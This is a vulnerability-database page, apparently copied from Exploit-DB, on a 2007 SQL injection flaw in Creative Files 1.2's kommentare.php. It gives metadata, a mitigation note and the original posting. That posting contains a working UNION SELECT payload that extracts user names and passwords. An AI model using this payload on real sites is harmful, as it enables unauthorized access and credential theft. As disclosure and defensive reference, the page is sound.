header-logo
Suggest Exploit
vendor:
Creative Files
by:
xoron
5.5
CVSS
MEDIUM
Remote SQL Injection
89
CWE
Product Name: Creative Files
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Creative Files 1.2 Remote SQL Injection Vulnerabilities

The vulnerability exists in the kommentare.php file of Creative Files 1.2. By manipulating the 'dlid' parameter, an attacker can execute arbitrary SQL queries, potentially leading to unauthorized access or data leakage.

Mitigation:

The vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Users should update to a patched version of the software.
Source

Exploit-DB raw data:

======================X=O=R=O=N=====================
+
+ Creative Files 1.2 (kommentare.php)  Remote SQL Injection Vulnerabilities
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ kommentare.php?dlid=-1/**/UNION/**/SELECT/**/null,null,null,name,null,PASSWORD,null/**/FROM/**/user/*
+
======================X=O=R=O=N=====================
+
+ Vendor site: http://www.thecreativeheads.de/CreativeFiles/downloads.php
+
======================X=O=R=O=N=====================
+
+ Thnx: pang0, unique
+
======================X=O=R=O=N=====================

# milw0rm.com [2007-03-16]

Navigation

Suggest Exploit

Services By CQR